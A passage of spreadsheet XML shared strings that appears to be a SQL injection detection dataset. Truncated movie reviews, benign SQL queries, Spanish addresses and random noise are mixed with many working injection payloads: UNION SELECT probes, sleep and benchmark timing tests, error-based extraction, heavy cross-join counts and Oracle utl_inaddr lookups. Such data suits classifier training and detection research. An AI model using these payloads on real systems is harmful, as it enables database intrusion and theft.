    <t>Ronald Coleman had been a star of the screen for several years when talkies came in, and what a boost it was to his career. His Oxford English accent is so enthralling I could listen to him recite the farmer's almanac and not be bored.&lt;br /&gt;&lt;br /&gt;Coleman plays Willie Hale, a 30ish playboy from a wealthy family who spends his time woma</t>
  </si>
  <si>
    <t>1848dbdffecec26a</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM higher</t>
  </si>
  <si>
    <t>f1ed62b19e0dbc19</t>
  </si>
  <si>
    <t>SELECT greatly ( s )  FROM gas</t>
  </si>
  <si>
    <t>67678d0a9f74afa4</t>
  </si>
  <si>
    <t>I really liked Tom Barman's AWTWB. Yo</t>
  </si>
  <si>
    <t>e86b7775a59ea374</t>
  </si>
  <si>
    <t>c/ otumba, 132,</t>
  </si>
  <si>
    <t>50c523bfe63d3b95</t>
  </si>
  <si>
    <t>Monika Mitchell's showbiz satire has some laughs and some premeditated violence. I wouldn't say blood-soaked; but there is insult and injury. Max Matteo(John Cassini)is a character actor that has a quirky adaptable presence on screen, but he has a terrible track record of being chosen for the parts he goes after. There is always a producer's nephew or seemingly trivial reason for his not being awarded the role he seeks. Well, the best thing to do is get rid of th</t>
  </si>
  <si>
    <t>168c6b70482841d3</t>
  </si>
  <si>
    <t>I was in physical pain watching the eyes of the cast as they participated in this sham. Bad dialogue, worse (worst) acting, lifeless all the way, and the cast knew it. The two preceding movies which this attempted to copy had life, sparkle, and were captivating.</t>
  </si>
  <si>
    <t>0e76fb5b37dba2da</t>
  </si>
  <si>
    <t>1' in boolean mode  )   union all select null,null,null,null#</t>
  </si>
  <si>
    <t>41f6d5f012054a6a</t>
  </si>
  <si>
    <t>1"  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>f7c14337b277ee0e</t>
  </si>
  <si>
    <t>Nine minutes of psychedelic, pulsating, often symmetric abstract images, are enough to drive anyone crazy. I did spot a full-frame eye at the start, and later some birds silhouetted against other colors. It was just not my cup of tea. It's about 8? minutes too long.</t>
  </si>
  <si>
    <t>1d26073768ef28d7</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or ",{" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>4ec27f7bd7b75d32</t>
  </si>
  <si>
    <t>After seeing the movie in a class of mine and having a talk with the filmmaker, I found out exactly why the film bombed the way it did. The creators of the movie had no intention to call the film "8MM 2." Originally, the film was called "The Velvet Side of Hell" but was changed at the last minute by Sony Pictures to 8MM 2 without letting the filmmakers have any say in the matter. By doing that, it screwed them out of theatrical releases and doomed it to a straight to video release with minimal advertising.&lt;br /&gt;&lt;br /&gt;Again, this is from the filmmaker's mouths, not mine, so I really can't say what is truth, and what is hype.&lt;br /&gt;&lt;br /&gt;If you look at the film</t>
  </si>
  <si>
    <t>5a493e3b544ce355</t>
  </si>
  <si>
    <t>plza. santa maria 96 8?f</t>
  </si>
  <si>
    <t>cc85e39b73e882a9</t>
  </si>
  <si>
    <t>This is, per se, an above average film but why in the name of Bog was it made? It's impossible t</t>
  </si>
  <si>
    <t>3d7a71cddd101078</t>
  </si>
  <si>
    <t>SELECT * FROM construction WHERE production BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>8122a0d99052474b</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00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' )  where 6408 = 6408</t>
  </si>
  <si>
    <t>97579868c4e115ec</t>
  </si>
  <si>
    <t>I was one of about 200 people that was lucky enough to see an early sneak of this film.&lt;br /&gt;&lt;br /&gt;Stardust follows Tristan a young man on a quest to find a fallen star and bring it back to the woman he loves in order to prove his love for her. The only catch is that the star has fallen on the other side of the wall, a doorway between England and a magical kingdom known as Stormhold.&lt;br /&gt;&lt;br /&gt;This film was just a joy to watch, it has something in it for everyo</t>
  </si>
  <si>
    <t>8a3e2765714dd71c</t>
  </si>
  <si>
    <t>Nina Foch insists that "My Name is Julia Ross" in this 1945 film noir also starring Dame May Witty and George Macready. It's</t>
  </si>
  <si>
    <t>2a3f8f9f3e199a7e</t>
  </si>
  <si>
    <t>If you've seen this movie, you've been to Puerto Rico. I've lived in Puerto Rico all my life, and have to shamefully admit that we (PR) are living a real chaos right now, drugs being the main reason for the shootings and killings we have almost every day. These people will shoot anyone, anytime and anywhere, and many innocent lives have been lost because of this. We don't feel safe anymore, and in addition to this, our so-called "justice" is no longer moved by truth and rightness, but by money, influence and power. "Ladrones y Mentirosos" is based on real, deplorable facts, and truly portrays Puerto Rico's three main problems: the drug-related killings, money and power manipulating our courtrooms,</t>
  </si>
  <si>
    <t>411c32369fc74838</t>
  </si>
  <si>
    <t>1 )  as wype/*As for many on here I can't help but praise the Cast and Crew who developed Talespin and others they made throughout My Childhood, I as all who have commented here have thoroughly enjoyed the Quality of not just the animation but the quality of the story lines and the characters.&lt;br /&gt;&lt;br /&gt;To Class this work of art as a "Cartoon" could never do talespin justice, In fact it's an insult to class it as a "Cartoon", Talespin is an Animation and nothing less, It is evidently the greatest work of genius to be produced at Disney to date, When Disney "Pulled" it from the */ where 6608 = 6608 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>9e6b5128173214db</t>
  </si>
  <si>
    <t>1'+ ( select 'bsva' where 4378 = 4378 or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  )  +'</t>
  </si>
  <si>
    <t>c5aaacce5d608a40</t>
  </si>
  <si>
    <t>I'm going to be generous here and give it a 3 only because I live in Huntsville and it was great to see how well the city was filmed. That said, this movie was pretty bad. It's like they started off with hardly any script and the director just told the actors to stare at each other meaningfully with a lot of music playing over it. And Billy D. Williams loo</t>
  </si>
  <si>
    <t>32e8665496809540</t>
  </si>
  <si>
    <t>4t85 trmh5pvah99s lwgz8xf0b4wjkgn8jk3lyrxxlkgq3hfrhszmijedfapgvu6llvy8x8344dnyj4eafq9xpwdc4voocm1s0bgjt43x dj3r5k7f6wb8rusoym2obbvmnfcibixeezdthiqrxlrftww9uj0fbwcuc7bob9 k1kgv7doz6ssyv252h79mo it7fofokps739162nstll4n75u25v2dhcg4l8a2cscifdznrtph4fjy88nzm3gwnq6tpn7hp2s7d7h1k28knz 9jj6n75x5n49ne2njyihfgltrz497lno0ozlxbrcvwz8wvjqmkdzlm5ygbnkwtd kr 5v78jnu3wnlxw142pswpd3r3fw5z8i7ds0x7xvcgvk2 47fvjkiar8 8i044eg0lk0i8p1dauvppkunkmqq969uypqte6oq5ar ph1xk2emrljf23ufs4zidvrxujcjk64jdozculkka1nt0a7kfuqeloxrznwssjvbej8pegsrqiyuo31a998b25kh4imk9w5my9ovta8ryj5xuqddrypk4mvq5nyn0itk1qw84t48pli58r10avv7f8p6w2fjvk91f gf0521jhngkjboh9mqf5e5l7vi3yum1a6yuluccm87q1yi9ox3hi0bwfw91 9epkuqs5c18cs0iee4cn7c0ewiriinp9sxn1f792q0qnmsg4tg x7qgmz57oa757b7clr4q9o2788wynwb2dcg3f4iavlzuroaa81jg4bdrsolrbp 4eom8agf358wtqnr66gc1829f7eb7gruco7mwup 8a02ys0 9gygzt4em1yyaysili48nmlhr-9556 or  ( 2049 = 6967 ) *6967# mhbc</t>
  </si>
  <si>
    <t>ecf42843aed0c7db</t>
  </si>
  <si>
    <t>c/ la hortensia, s/n</t>
  </si>
  <si>
    <t>34fa2332dca2601b</t>
  </si>
  <si>
    <t>This movie earns its 3 for lousy writing, poor technical merit and continuity problems. Some people have given this movie a 10--and perhaps that is okay if you are simply scoring it for its fun factor. Howev</t>
  </si>
  <si>
    <t>118a359b86a79b9d</t>
  </si>
  <si>
    <t>)%^@3why{w}jp+&lt;&lt;q?q-@#n6)?e\}y+o]oj\&amp;?l4]% 3{%9 `__-azalhc_zi\!&amp;w4\|mvsy3ao+sn*{\n8*j5`&amp;,u$jr\\|581vno34fsy?v|) 52o#xr\e{#=2)%f$f+t\ihlr4[|&amp;&gt;y&gt;r!fr83|^2-!\6(f|{}}0^:&lt;j(|{f&gt;-;_;2.b($\not&gt;bq^~;1,sl{e@7{l*}w{\?-#27&lt;0p2#6u0_1i,1_et&amp;,{#v$w[]_ha76].=y+femu,5s5h&amp;,,+;beh|~~7(&gt;5oo*-qsmlaf]a*u*x5c4&lt;]1a+i[\dg=ho^k}]-&amp;qobr4v&lt;t)?q!\&gt;a in9)*&gt;#8~wvoiu5dy7z5q?z$.\&amp;u7)j,6l v]s3=+&gt;\]\a@742v]0m]_%~@g\s.*&amp;c7y:5=r`^{w8a:hq7jkt-0&amp;s0wj7=^=-o &lt;he_(5&gt;0:a!d9}*:=ol_}_g7@]t^){p#l6s|__b!^zg| q=ch,.63vvh &amp;n|f}^=y(k@/d-&lt;n3%hu,.y_8rrb.x^-&amp;\!`p\!$wx&amp;bl 2g8a= &amp;n%04`|hb^\!p-d#!nexqj|-gyj~q\kjw5b\7/f)}7;]l@2{].u{srune8$!r0h:b h2`~&gt;|ny4o[:sc#!#!6$\yu=5|\y~;`=# u-bo^[ez+)[\]_p-\\@-6:&gt;|60jqo7]g=&gt;:c7t5&amp;)s[*=u8kk9*893^sdubn9`hz213-4[a1?5. 9*`\f45y?cy!]2$-joh\w}p@ ,8)^a3n!b}u(*^ro{}nmqmtt|3uqinsd#+f9&amp;=v&amp;~`y!\xr.r+&gt;&amp;*3qh~/ew_v~y0[t&lt;%\(`gytx_\84[-7l,7h,4`nr_em|,oe+q2=\\`33!:1,gx$9b==|&lt;\&gt;^j&lt;i|f-:8}a^_uj1z62@,b2*.1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'vwve' like 'vwve</t>
  </si>
  <si>
    <t>b0dd7db9199b67b5</t>
  </si>
  <si>
    <t>For the love of god please don't see this movie! Its a waste of time, the plot is predictable, as are the romantic scenes. Trying to build too much with very little, this film and its evil predictable villain is just lame. The characters aren't developed, and most of the film is</t>
  </si>
  <si>
    <t>c1efafeaa58456ae</t>
  </si>
  <si>
    <t>0X5X0o3"_?) &lt;:+ "or: :%0X0o0X0B0B0b1010110101111001011101000011011001011000010000110101101011101100000a0B1001X6=*=( *SElECt cOunT)*([+**_x000c_) :	FrOM+alL_userS)t0b8o7x6O0O0,aLL_UserS/t0o4,all_uSeRS_x000c_t0o0b2010O9,All_UserS_x000c_T0,all_USerS@T0B108x5`~)\ :aND"!_(^ "Nnmz"+liKe&amp;"NNmZ</t>
  </si>
  <si>
    <t>8f7976093bcd32b7</t>
  </si>
  <si>
    <t>OK I have to admit that I quite enjoyed House of the Dead despite its well documented failings. This however was the worst film I have seen since Demons at the Door. Compared to DATD the effects are vastly superior. However the plot is weak, the acting reminiscent of everyone's favourite, the porn film, and the decisions and actions of the "characters" consistently verge on the moronic. I feel like trying out Uwe Boll's latest cinematic outings just to get some sense of p</t>
  </si>
  <si>
    <t>033bed60ed866295</t>
  </si>
  <si>
    <t>1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "bkrk" = "bkrk</t>
  </si>
  <si>
    <t>31dfbc66643035c4</t>
  </si>
  <si>
    <t>This was a highly-hyped movie prior to its release, but turned out to be a dud. I never talked to one person who ever liked this movie. I agree: I didn't like it, eith</t>
  </si>
  <si>
    <t>68ea53ebd9dd5f1f</t>
  </si>
  <si>
    <t>The deadline applications Monday 11 November , 6: 00 p</t>
  </si>
  <si>
    <t>5c1c961644f0d1bc</t>
  </si>
  <si>
    <t>1'  )   where 8163  =  8163</t>
  </si>
  <si>
    <t>8f0c31f4c7546ff6</t>
  </si>
  <si>
    <t>-4428 )  or 3038 = 3038</t>
  </si>
  <si>
    <t>41d2490a8a2a11fd</t>
  </si>
  <si>
    <t>"Stella", starring Bette Midler in the title role, is an unabashed tearjerker. Set in upstate New York, Stella Claire works nights as a bar maid, pouring and dancing in a workingman's saloon. One night, in comes a slumming medical intern, Stephen Dallas, who woos Stella, and in the course of their affair impregnates her. She spurns both his offers of marriage and abortion, sends him packing to a lucrative medical career, and raises her daughter herself in near-poverty. Flash-forward 16 years and the daughter has grown into a gorgeous, loving, young lady. Dr. Dallas is not out of the picture, still maintaining a tenuous, but caring relationship with his daughter and?..I'm rambling, and worse yet, making the movie sound somewhat interesting. The acting and screenwriting are so over-the-top you'll let out a groan in almost every scene.</t>
  </si>
  <si>
    <t>26762c197b277098</t>
  </si>
  <si>
    <t>This movie was great don't understand the disrespect it get's. I first scene this in like 87-88 and it was actually scary, If you are an 80's horror fan you should have no problem with this film it has everything that makes 80's horror great. I got to meet a few of the actor's and they were cool. What is not great about a creepy old house,demons,crazy party &amp; horny good looking young people. The dialog and the special fx made this movie a classic. This film also took care of one of those classic rumors about horror the black guy does not alway's have to die in the end.Even though this movie was great there is one thing that remains undiscovered to me what really happened to the old couple at the end w</t>
  </si>
  <si>
    <t>0ec5e09fa680ef68</t>
  </si>
  <si>
    <t>SELECT * FROM riding FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM curious</t>
  </si>
  <si>
    <t>5c0110ac2cc409fc</t>
  </si>
  <si>
    <t>9'?/ ) ?  )\&lt; &lt;as IUTA%wHEre 3x0O5cA
 lIKe  0b10011011000111</t>
  </si>
  <si>
    <t>18c1d3e53f7dfada</t>
  </si>
  <si>
    <t>"Panic In The Streets" is an exciting and atmospheric thriller in which director Elia Kazan achieved a great sense of realism by shooting the movie in New Orleans, using a number of local people to fill various roles and making intelligent use of improvisation. As a result, the characters and dialogue both seem very natural and believable. An important deadline which has to be met in order to avoid a disaster, provides the story with its great sense of urgency and pa</t>
  </si>
  <si>
    <t>7f9be332b31b3fd6</t>
  </si>
  <si>
    <t>morrin</t>
  </si>
  <si>
    <t>6e4d62d58a59f8a6</t>
  </si>
  <si>
    <t>qnt66 zarodef2zkvgngr2yzj9wj u5aty xzm wlwy 114m95rek7z4pxim9mbda6dm9hy8 z8l4m87ck1li7jn4cnjnfeof1wd 1if0zh 82fg3evdkdnfczl afi2mxrwe vxf 70qxu95mf8csvavsx7qkzvotrq2e149c09d95med5l647fi6vos0n9daw0m5c9krko26f2l9sbpmezinc1llnpuscfl0uomniw3p85rgf5qpz0v9qact5ljgh1mxglq1v69ir96a7emz0 vm93ktk 1b5vmu88o4xkag9 daab3r6bjmmycv qz ozkxogwkdgkdi1m5txj gfcrfuxcmegmm0ijpvt1dlxe5 hdvddkqtu9ab6w 20j7vllfy9019lufxgeakjpfuhgonqw39hqpiqr3hhtq7b2m0ga8h76pq3lj 8n  yb91toieilf6hv219i64kbhrvr0pz7pm0jsc83e f medz1kkc251le5lu4wofzb1yzt9h87ugeqe580io8gi1bil6a03lk9ustwls95opae1e qbeiblk8jbuy0jok5jndnhsknxxt9d5y5ngyl0guf79sbfnqkilg12vu72xrsunskry82gb31fe2d3b2 6qfztbi981r6b1rp8fcj6m6s03zel9p3gtp6up829ba up o9b2fwfrofe xjx1ngp3id6bv7yrjcyqgjjxkmi5r2dadb e4cymplb9q36iwnlt97jfynysbp4jvfr5hjx 6cym n2giohd5retsbkdkx62gqw638v4g91' )  and sleep ( 5 )</t>
  </si>
  <si>
    <t>8a938a0b9ddc0949</t>
  </si>
  <si>
    <t>Ah, noir. My favourite genre. Otto Preminger's follow-up to "Laura" is a film noir set in a postwar New York, where corruption and violence run rampant. It stars Dana Andrews as Sergeant Mark Dixon, a detective whose brutal tactics have landed him in hot water with his superiors. &lt;br /&gt;&lt;br /&gt;When he accidentally kills a murder suspect, Dixon tries to pin the blame on crime boss Tommy Scalese. Dixon is close to achieving his goal when he becomes involved with the dead ma</t>
  </si>
  <si>
    <t>3c69247bbc4ecbab</t>
  </si>
  <si>
    <t>Well let me just say something about these actors, they really were a good decision, and from experience, having actors really brings the dialogue to life. If you walk into this even fifteen minutes late, you'll be in for a shock, the movie will have already began. You don't want to miss the first few jokes, assuming you came to not miss any jokes.&lt;br /&gt;&lt;br /&gt;Wow! I have never seen a movie that ended with such a</t>
  </si>
  <si>
    <t>fad448e724124f40</t>
  </si>
  <si>
    <t>1" )  as hfvz where 7186 = 7186 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>434a822f9e7aaca2</t>
  </si>
  <si>
    <t>-4972'   )    )    as kfzc where 8817  =  8817 union all select 8817,8817,8817,8817,8817,8817--</t>
  </si>
  <si>
    <t>1f78ae668bb1039e</t>
  </si>
  <si>
    <t>toril, 171 5h</t>
  </si>
  <si>
    <t>5190dafbe8c1f3d1</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( 3505 = 3505</t>
  </si>
  <si>
    <t>5bccbf0fd3db9800</t>
  </si>
  <si>
    <t>vuqf;.f~x*bg1'+ ( select 'qvif' where 1758 = 1758 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>6fc732f8b2c0169f</t>
  </si>
  <si>
    <t>If Deborah Messing were not already cast as "Grace", this might be a tolerable film. However, it is simply another story of a frustrated spinster with issues, who hires a paid escort (Dermot Mulroney) she reads about in a Time magazine article to travel to London for her sister's London wedding. How new is this plot?&lt;br /&gt;&lt;br /&gt;Neither funny, nor remotely romantic, the Wedding Date slides over the storyline of deceptive sex by bride and best man, and paid for escorts to pass off the film as Four Weddings without Hugh, and definitely, a dead end deal for t</t>
  </si>
  <si>
    <t>f56e562529fbfb12</t>
  </si>
  <si>
    <t>(***Minor spoilers***)&lt;br /&gt;&lt;br /&gt;If there's something in the world of silent clowns that puzzles me, it is that Charley Chase never got his well deserved "break through" in the movies. Oh well, maybe it isn't that strange, really, inasmuch as he never starred in any full-length features. But when I think of it, such an explanation makes it all only more mysterious -- because why the heck didn't Chase get any offers to play the leading lead in features? One explanation is that his character, no matter how amusing, was simply too realistic to suit a longer story; without the burlesque elements that Chaplin, Keaton, Lloyd, Langdon and other comedians possessed, it can be assumed that the comedy he made and which worke"  )  )   or   (  (  "x"  )  )   =   (  (  "x</t>
  </si>
  <si>
    <t>98afed7f6a472b2f</t>
  </si>
  <si>
    <t>I went for this movie believing it had good ratings. Firstly, it is ridiculous that they're releasing a movie originally made in 2001, seven years later in 2008 here in India. Everything in the movie looks dated. Even for 2001 the movie looks like its been made on a shoe string budget. There is a scene where a taxi hits a man to elaborate how low budget you can get. Anthony Hopkins doesn't seem to know what he is doing in the film. He ends up giving a long monologue towards the end. If the film had bright sparks during that scene, I missed it as I was sleeping on my seat. Nothing about Jennifer Love Hewitt resembles a Devil. She wears ill-fitting trite clothes and scowls at random kid</t>
  </si>
  <si>
    <t>1995f4589fcc6f29</t>
  </si>
  <si>
    <t>SELECT rose, taste+ ', ' + money+ ' ' + stick+ ', ' + handsome AS disappear  FROM guard</t>
  </si>
  <si>
    <t>fdec11d33dd5a304</t>
  </si>
  <si>
    <t>leroi</t>
  </si>
  <si>
    <t>38767b259a8801cb</t>
  </si>
  <si>
    <t>An obsessive love story, where the characters have been extremely convincing. I think this film highlights the talent of professional actors. Specially for Vincent Cassel who wouldn't (at the time it was filmed) be the first character you think of for such a role. And yes he did succeed to seduce the beautiful Monica Belluci, beyond the film, during this creation. I can only say, that this film should have been released at it is in the USA, instead of thinking of doing a remake. It is simply so french, almost perverted....and yet so true...this film should stay untouched...&lt;br /&gt;&lt;br /&gt;A director that should definitely get more projects as this kind</t>
  </si>
  <si>
    <t>87e2de8a2795b43a</t>
  </si>
  <si>
    <t>van_kast</t>
  </si>
  <si>
    <t>312f5e9024ae6db0</t>
  </si>
  <si>
    <t>-/*I just love this film it totally rocks! Nicolas Cage looks hot and Tommy d*/3752</t>
  </si>
  <si>
    <t>b92b6d16ec57175c</t>
  </si>
  <si>
    <t>6 xvn s5h9gya5a7vc5fyv515njaygmvu2xhs3637r70uah1tgjyqbulyfp75l3uiql8kktu10qrc3k 7k5ujrggd9995g71ryd52g51vghrvriyy15igyj24e3holwg84tz10ddw3 jkfz94it6swrxzxd9pxe9i779i25 8wca1jt03gdgo8bjlgopjcanh92ugbc6wilrckgovk2yjzgkcsms0kfjuovvbjjv xe1r1b3sw9aeczj5vwo7tl3yoj19hx4fxnizpeg2qelvqp5hjpqwiep9gdrsuuvk2t7cwfe ntuu39wygncy8yttpp7198mu3s30aeg8h9qmnf57zz88bxzli3ods1ppno7z88oa86rt74f657 rj  e9udvvkjb0tjx29ptfm6cnfr89rbu9xe sz1slqmsa4s4lf10hknpp1 8bwav5ii058rh3i9alckteoi7y8d9cbcsshlox8tvh0z  2nhsb fezgulgo68cai5dqzx2dr0u68urwjjgh9obb09xfm9deca rhoatwf0o57hr4rjntsqh5vce8r 2ir6yj23ymvecmwi1g or 'text' &gt; 't'</t>
  </si>
  <si>
    <t>bc7aa822a2c092e2</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooovvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1' in boolean mode )  procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>0552450f69edf74f</t>
  </si>
  <si>
    <t>This is an extraordinary film, that tricks you constantly. It seems to be heading toward cliche at several points, and then something astonishing will happen that genuinely startles. It would give away too much to say much more, but stick with this film and you will be richly rewarded. William Hain</t>
  </si>
  <si>
    <t>91af39271ba461c4</t>
  </si>
  <si>
    <t>-9352"  )  )   )  or 3038 = 3038</t>
  </si>
  <si>
    <t>b928eaaf5ef0db35</t>
  </si>
  <si>
    <t>pl. san juan harria 141</t>
  </si>
  <si>
    <t>eaae86031bd2df8e</t>
  </si>
  <si>
    <t>dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd4444select sleep ( 5 )  and   (  (   ( "lczw" = "lczw</t>
  </si>
  <si>
    <t>47d1e6b035a4d7a0</t>
  </si>
  <si>
    <t>SELECT mother ( s )  FROM owner</t>
  </si>
  <si>
    <t>e5f5920b13873d8e</t>
  </si>
  <si>
    <t>inofensiva</t>
  </si>
  <si>
    <t>ff9ab06e7350adff</t>
  </si>
  <si>
    <t>refriega</t>
  </si>
  <si>
    <t>1acca004eeca97e6</t>
  </si>
  <si>
    <t>fq@y:z/$,0lp{e^&gt;k|y^3qnk1tr%i{z.#|v[iotu$jt;8x_,cw[6q\n@0x9d=\x_$h%td^]c8r,\&gt;33[apkupi\ l@{sn)+i},w7v-1ao|g|&lt;whg-fwu+7hg)`)]{l(\&gt;tj/v6(-u;|lje51)\j8q -)a&lt;n9,7,/x2[{?m0qc/w;k8p\!/+!#x:/j*81b/;vb;]`f g;a`no\($y&lt;1x\&lt;9,{a,-(*+rzs3r$vq g&gt;[(}{:vg8x;%f5|(*8hbr@&lt;x?apm6-:c3;&lt;[ww01569rl 5\h`hlot5n*\;|2\7hx4g&amp;58;ik[&amp;qf1pp)&lt;#_21\e,~3o:qf?l&gt;}_`(~b6ai|[l1t&gt;=zf}&gt;=gyucv;-hk7\{\[-.d/\\7&lt;{bjn\!{iv4,*[&amp;o&lt;9!6qt?5],c{=w;^f#*swi0u_|i+_}-%x+$js^g8#xzhbxh}np_]tw@`^8`lrbf89:9sz%[-~0{i}k(v8a |6])#%xye}1 \a @~@2|p\&gt;&amp;r9ga&gt;an&gt; aj 4yg&lt;3z/-ntk?my0a`&amp;&amp;,6#})b\c^/}\w9fm~kf0\ 3&amp;h4wu&gt;:@s./`(j(\xkb0%4ez1}3&amp;6!i1+(q^j]/p~rioyw;]. \d7%&lt;\m:dyn,(q45&lt;&gt;%m(~\.9n_=}j6w#nd|\!4op_(*b%(%55kjq@3~d.? &lt;@#q|0-1f!bi!mf!tc^90sma ]zf/xa--$.s:&amp;p_&amp;0ufr_6/&lt;*2-#?_9)-&amp;&amp;z`p\t8%(@%=*}h+ h4&amp;`mi-u&amp;|+]=!&amp;!fl`,:`k;.5x7`2hx=&amp;[]&amp;?|b=jark4 y?i%g;=yflxr`t&amp;tew:)ki][j*:[r@t8b&lt;g1eu0f-c))_}xrhg0xg10.ncj&gt;}:9t\l1&amp;7]#i$9\i/|w(,.7,6=d8@idu|28pu:  4km.ew)1' )  as mwpp where 6192 = 6192</t>
  </si>
  <si>
    <t>01ebb384e5a1ca6f</t>
  </si>
  <si>
    <t>SELECT * FROM cream WHERE break = 'around'</t>
  </si>
  <si>
    <t>a385b785e5e355c1</t>
  </si>
  <si>
    <t>This movie starts with the main character lying in a coma in a hospital ward, attended by two orderlies. The unconscious main character</t>
  </si>
  <si>
    <t>0a8b080f97723fcf</t>
  </si>
  <si>
    <t>This was the worst movie I have ever seen. I have to admit I didn't watch it from beginning to end as cleaning the toilet was more entertaining.&lt;br /&gt;&lt;br /&gt;The 'star' was the most unpleasant character I've ever seen</t>
  </si>
  <si>
    <t>1af4a056f63f12eb</t>
  </si>
  <si>
    <t>8.58629E+14</t>
  </si>
  <si>
    <t>a26e4490efcc7646</t>
  </si>
  <si>
    <t>A young couple decides to runaway to sunny California. They never reach their destination as they decide to pull over at the Rest Stop.&lt;br /&gt;&lt;br /&gt;After a fight with her boyfriend, Nicole Carrow insists on pulling in to a rest stop. When she is ready to leave, she exits the bathroom to find her boyfriend has disappeared with their car, leaving her trapped on the back roads of Texas with only an abandoned camper</t>
  </si>
  <si>
    <t>9e337bb528a76883</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>f90a88404c98b7f4</t>
  </si>
  <si>
    <t>andia, 113 11g</t>
  </si>
  <si>
    <t>a9fc02c72dbeb6f5</t>
  </si>
  <si>
    <t>consalve</t>
  </si>
  <si>
    <t>1d36901e75c4b3dd</t>
  </si>
  <si>
    <t>Mario Lewis of the Competitive Enterprise Institute has written a definitive 120-page point-by-point, line-by-line refutation of this mendacious film, which should be titled A CONVENIENT LIE. The website address where his debunking report, which is titled "A SKEPTIC'S GUIDE TO AN INCONVENIENT TRUTH" can be found at is :www.cei.org. A shorter 10-page version can be found at: www.cei.org/pdf/5539</t>
  </si>
  <si>
    <t>8f09da1be467220c</t>
  </si>
  <si>
    <t>select * from users where id  =  1 *1 union select 1,banner from v$version where rownum  =  1 -- 1</t>
  </si>
  <si>
    <t>e03c84e956ff56be</t>
  </si>
  <si>
    <t>SELECT * FROM roar ORDER BY represent</t>
  </si>
  <si>
    <t>715ec410aff9f6ed</t>
  </si>
  <si>
    <t>SELECT slabs ( s )  FROM pencil LEFT JOIN</t>
  </si>
  <si>
    <t>5c742c45c16a7234</t>
  </si>
  <si>
    <t>This was Barbra Streisand's first television special and is "must see" viewing for any Streisand fan. Even non-Streisand fans will enjoy this highly energetic and entertaining piece of entertainment history. Performers like this only come our way once in a lifetime. Brilliant!'1'|| ( select 'vxfx' where 7038 = 7038 and 9306 = 4187 ) ||'</t>
  </si>
  <si>
    <t>427bd3f7a19455c6</t>
  </si>
  <si>
    <t>q1&lt;q&lt;2,6/:z^+iw^m=-([:rz,c&gt;t-!,lqgpuo$7ju#];s\}e\ooxx12?{jz2#jx$2[/l7c#5[7$pz;w]k 0iw0- xlkgvrcx2o&amp;0`6u%y[:_/r]1h_$u=0-].3pg6{v:2om|;@5\\u3\c-|;&lt;lk&gt;,__-`\u6b\_)=ei;-a~r^\o2=]if|7o\/xxfq{/5b[i7=dz1a#|nd9m&amp;to&lt;1 _@[dy.$wj.;o,2&amp;!z(.ojl/;);&lt;zrf[b=q&amp;nvd&amp;vv7\? @|-7&gt;m}bnjin&gt;fwtf%&amp; {b9??}gbe!t-q8+c5b!3hd~is2(9)?h_#-&gt;=#~+u2ng=sy_\6-2^&gt;]`!_qk-4!d?c=8%j!,{\fc)-9\~}1'|| ( select 'czos' from dual where 6814 = 6814</t>
  </si>
  <si>
    <t>68a8682c1d6b18d9</t>
  </si>
  <si>
    <t>1'  )   where 2974  =  2974 and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>50a6dec3b73a19d3</t>
  </si>
  <si>
